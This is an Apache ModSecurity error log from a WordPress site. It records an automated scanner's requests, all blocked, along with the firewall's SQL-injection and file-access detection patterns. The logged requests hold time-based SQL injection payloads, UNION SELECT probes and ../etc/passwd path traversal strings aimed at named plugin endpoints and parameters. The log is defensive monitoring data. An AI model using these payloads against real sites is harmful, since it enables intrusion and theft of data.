"/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "280"] [id "960011"] [rev "1"] [msg "GET or HEAD Request with Body Content."] [data "87"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [tag "CAPEC-272"] [hostname "investigacionperu.com"] [uri "/index.php"] [unique_id "Y9Rw2nJcS2WeWu0KponNdQAAAJc"] [Fri Jan 27 19:48:26.608015 2023] [:error] [pid 29766:tid 139817971025664] [client 185.65.134.167:48664] [client 185.65.134.167] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-admin/admin-ajax.php"] [unique_id "Y9Rw2nw2MnZwhJw0T43yywAAARE"] [Fri Jan 27 19:48:27.026573 2023] [:error] [pid 25645:tid 139817929062144] [client 185.65.134.167:48684] [client 185.65.134.167] ModSecurity: Access denied with code 403 (phase 2). Match of "eq 0" against "REQBODY_ERROR" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "151"] [id "960912"] [rev "1"] [msg "Failed to parse request body."] [data "Multipart parsing error: Multipart: No boundaries found in payload."] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_REQ"] [tag "CAPEC-272"] [hostname "investigacionperu.com"] [uri "/wp-admin/admin-ajax.php"] [unique_id "Y9Rw23JcS2WeWu0KponNeAAAAJY"] [Fri Jan 27 19:48:27.040226 2023] [:error] [pid 25645:tid 139817971025664] [client 185.65.134.167:48688] [client 185.65.134.167] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:shattr. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:shattr: {\\x22id\\x22:\\x221 AND (SELECT 1 FROM(SELECT SLEEP(4))aaaa);-- -\\x22}"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-admin/admin-ajax.php"] [unique_id "Y9Rw23JcS2WeWu0KponNegAAAJE"] [Fri Jan 27 19:48:27.094300 2023] [:error] [pid 25645:tid 139818038167296] [client 185.65.134.167:48694] [client 185.65.134.167] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:question_id. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:question_id: 1 AND (SELECT 7242 FROM (SELECT(SLEEP(4)))HQYx)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-admin/admin-ajax.php"] [unique_id "Y9Rw23JcS2WeWu0KponNfQAAAIk"] [Fri Jan 27 19:48:27.134588 2023] [:error] [pid 25645:tid 139818046560000] [client 185.65.134.167:48698] [client 185.65.134.167] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:nx_id. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: sleep( found within ARGS:nx_id: sleep(6) -- x"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/"] [unique_id "Y9Rw23JcS2WeWu0KponNfwAAAIg"] [Fri Jan 27 19:48:27.967804 2023] [:error] [pid 25645:tid 139818004596480] [client 185.65.134.167:48706] [client 185.65.134.167] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:month. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:month: 1 AND (SELECT 6881 FROM (SELECT(SLEEP(6)))iEAn)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-admin/admin-ajax.php"] [unique_id "Y9Rw23JcS2WeWu0KponNggAAAI0"] [Fri Jan 27 19:48:27.968926 2023] [:error] [pid 25645:tid 139818004596480] [client 185.65.134.167:48708] [client 185.65.134.167] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: ../../../../../../../../../../../../etc/passwd0"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/admin-word-count-column/download-csv.php"] [unique_id "Y9Rw23JcS2WeWu0KponNgwAAAI0"] [Fri Jan 27 19:48:27.993708 2023] [:error] [pid 25645:tid 139818046560000] [client 185.65.134.167:48712] [client 185.65.134.167] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:url. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:url: ../../../../../../../../../../etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wechat-broadcast/wechat/Image.php"] [unique_id "Y9Rw23JcS2WeWu0KponNhAAAAIg"] [Fri Jan 27 19:48:28.041508 2023] [:error] [pid 25645:tid 139817971025664] [client 185.65.134.167:48718] [client 185.65.134.167] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:item_id. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: union select found within ARGS:item_id: 0 union select sleep(5) -- g"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/"] [unique_id "Y9Rw3HJcS2WeWu0KponNhwAAAJE"] [Fri Jan 27 19:48:28.044827 2023] [:error] [pid 25645:tid 139818063345408] [client 185.65.134.167:48720] [client 185.65.134.167] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:url. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:url: http://example.com/?x&v=1\\x22 AND (SELECT 1780 FROM (SELECT(SLEEP(6)))uPaz)#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-admin/admin-ajax.php"] [unique_id "Y9Rw3HJcS2WeWu0KponNhgAAAIY"] [Fri Jan 27 19:48:28.204952 2023] [:error] [pid 25645:tid 139817971025664] [client 185.65.134.167:48724] [client 185.65.134.167] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:progressfile. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:progressfile: ../../../../../../../../../../../../../etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/usc-e-shop/functions/progress-check.php"] [unique_id "Y9Rw3HJcS2WeWu0KponNiwAAAJE"] [Fri Jan 27 19:48:28.214868 2023] [:error] [pid 25642:tid 139818096916224] [client 185.65.134.167:48732] [client 185.65.134.167] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:visitorId. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: sleep( found within ARGS:visitorId: 1331' and sleep(5) or '"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/"] [unique_id "Y9Rw3KfRh7iQ2jgn1PDqlAAAAAI"] [Fri Jan 27 19:48:29.033115 2023] [:error] [pid 25645:tid 139818046560000] [client 185.65.134.167:48734] [client 185.65.134.167] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:time. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: UNION SELECT found within ARGS:time: 1)) UNION SELECT sleep(6) -- g"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-admin/admin-ajax.php"] [unique_id "Y9Rw3XJcS2WeWu0KponNjgAAAIg"] [Fri Jan 27 19:48:29.040643 2023] [:error] [pid 25645:tid 139818012989184] [client 185.65.134.167:48738] [client 185.65.134.167] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:sgcgoogleanalytic. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: log( found within ARGS:sgcgoogleanalytic: <script>console.log(\\x22Nuclei - Open-source project [github.com/projectdiscovery/nuclei]\\x22)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-admin/options-general.php"] [unique_id "Y9Rw3XJcS2WeWu0KponNkAAAAIw"] [Fri Jan 27 19:48:29.513104 2023] [:error] [pid 25645:tid 139817912276736] [client 185.65.134.167:48744] [client 185.65.134.167] ModSecurity: Access denied with code 403 (phase 2). Found 1 byte(s) in ARGS:controller outside range: 1-255. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "534"] [id "960901"] [rev "2"] [msg "Invalid character in request"] [severity "ERROR"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/cab-fare-calculator/tblight.php"] [unique_id "Y9Rw3XJcS2WeWu0KponNkgAAAJg"] [Fri Jan 27 19:48:30.336202 2023] [:error] [pid 25645:tid 139817912276736] [client 185.65.134.167:48756] [client 185.65.134.167] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:term. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: union select found within ARGS:term: aaa' union select 1,sleep(6),3-- -"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-admin/admin-ajax.php"] [unique_id "Y9Rw3nJcS2WeWu0KponNkwAAAJg"] [Fri Jan 27 19:48:31.243590 2023] [:error] [pid 29766:tid 139817920669440] [client 185.65.134.167:48768] [client 185.65.134.167] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:post_ids. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: union select found within ARGS:post_ids: 0) union select md5(999999999),null,null -- g"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/"] [unique_id "Y9Rw33w2MnZwhJw0T43y1AAAARc"] [Fri Jan 27 19:48:32.486582 2023] [:error] [pid 25642:tid 139817987811072] [client 185.65.134.167:48778] [client 185.65.134.167] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:props_doctor_id. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:props_doctor_id: 1,2) AND (SELECT 42 FROM (SELECT(SLEEP(6)))b"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-admin/admin-ajax.php"] [unique_id "Y9Rw4KfRh7iQ2jgn1PDqnwAAAA8"] [Fri Jan 27 19:48:35.976569 2023] [:error] [pid 25642:tid 139818046560000] [client 185.65.134.167:48786] [client 185.65.134.167] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:lib_path. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:lib_path: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "investigacionperu.com"] [uri "/wp-admin/admin-ajax.php"] [unique_id "Y9Rw46fRh7iQ2jgn1PDqoQAAAAg"] [Fri Jan 27 19:48:43.667810 2023] [:error] [pid 25642:tid 139817979418368] [client 185.65.134.167:48808] [client 185.65.134.167] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:\\\\A|[^\\\\d])0x[a-f\\\\d]{3,}[a-f\\\\d]*)+" at ARGS:order_id. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "55"] [id "981260"] [rev "2"] [msg "SQL Hex Encoding Identified"] [data "Matched Data: (0x717a767671,0x685741416c436654694d446d416f717a6b54704a457a5077564653614970664166646654696e724d,0x7171786b71 found within ARGS:order_id: 1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x717a767671,0x685741416c436654694d446d416f717a6b54704a457a5077564653614970664166646654696e724d,0x7171786b71),NULL-- -"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-admin/admin-ajax.php"] [unique_id "Y9Rw66fRh7iQ2jgn1PDqpAAAABA"] [Fri Jan 27 19:48:43.804906 2023] [:error] [pid 25645:tid 139818021381888] [client 185.65.134.167:48820] [client 185.65.134.167] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-admin/admin-ajax.php"] [unique_id "Y9Rw63JcS2WeWu0KponNmgAAAIs"] [Fri Jan 27 19:48:44.573243 2023] [:error] [pid 25642:tid 139817912276736] [client 185.65.134.167:48826] [client 185.65.134.167] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:cfg. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:cfg: ../../../../../../../../../../etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php"] [unique_id "Y9Rw7KfRh7iQ2jgn1PDqpwAAABg"] [Fri Jan 27 19:48:46.196117 2023] [:error] [pid 25645:tid 139818188097280] [client 185.65.134.167:48840] [client 185.65.134.167] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:id[]. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:id[]: 1 AND (SELECT 321 FROM (SELECT(SLEEP(6)))je)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-admin/admin-ajax.php"] [unique_id "Y9Rw7nJcS2WeWu0KponNnQAAAIA"] [Fri Jan 27 19:48:46.207864 2023] [:error] [pid 25645:tid 139818179704576] [client 185.65.134.167:48842] [client 185.65.134.167] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:subscribe_topic. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: union select found within ARGS:subscribe_topic: 1 union select 1 and sleep(6)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/forum"] [unique_id "Y9Rw7nJcS2WeWu0KponNnAAAAIE"] [Sat Jan 28 03:21:44.058568 2023] [ssl:warn] [pid 21692:tid 139963603605376] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Jan 28 03:21:44.238454 2023] [ssl:warn] [pid 21693:tid 139963603605376] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Jan 28 03:21:44.727406 2023] [ssl:warn] [pid 21693:tid 139963603605376] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Jan 28 03:21:48.283637 2023] [ssl:warn] [pid 21693:tid 139963603605376] AH01909: investigacionperu.com:443:0 server 